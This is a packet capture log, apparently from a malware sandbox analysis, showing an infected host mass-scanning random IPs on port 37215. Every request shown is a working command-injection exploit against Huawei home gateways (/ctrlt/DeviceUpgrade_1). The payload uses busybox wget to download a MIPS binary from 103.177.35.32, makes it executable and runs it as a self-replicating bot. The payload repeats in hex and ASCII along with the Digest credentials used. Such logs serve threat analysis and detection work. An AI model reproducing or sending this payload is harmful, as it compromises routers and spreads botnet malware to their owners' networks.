                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2573192.168.2.2349262129.44.153.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627795935 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2574192.168.2.2351392157.9.52.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627798080 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2575192.168.2.2338392197.180.105.2937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627798080 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2576192.168.2.234755241.128.241.21637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627813101 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2577192.168.2.234084241.21.217.2837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627823114 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2578192.168.2.234539041.3.136.1337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627826929 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2579192.168.2.2339562197.203.253.25137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627914906 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2580192.168.2.235605673.79.182.11437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627923965 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2581192.168.2.234440241.41.12.25237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627926111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2582192.168.2.233573844.194.143.2037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627926111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
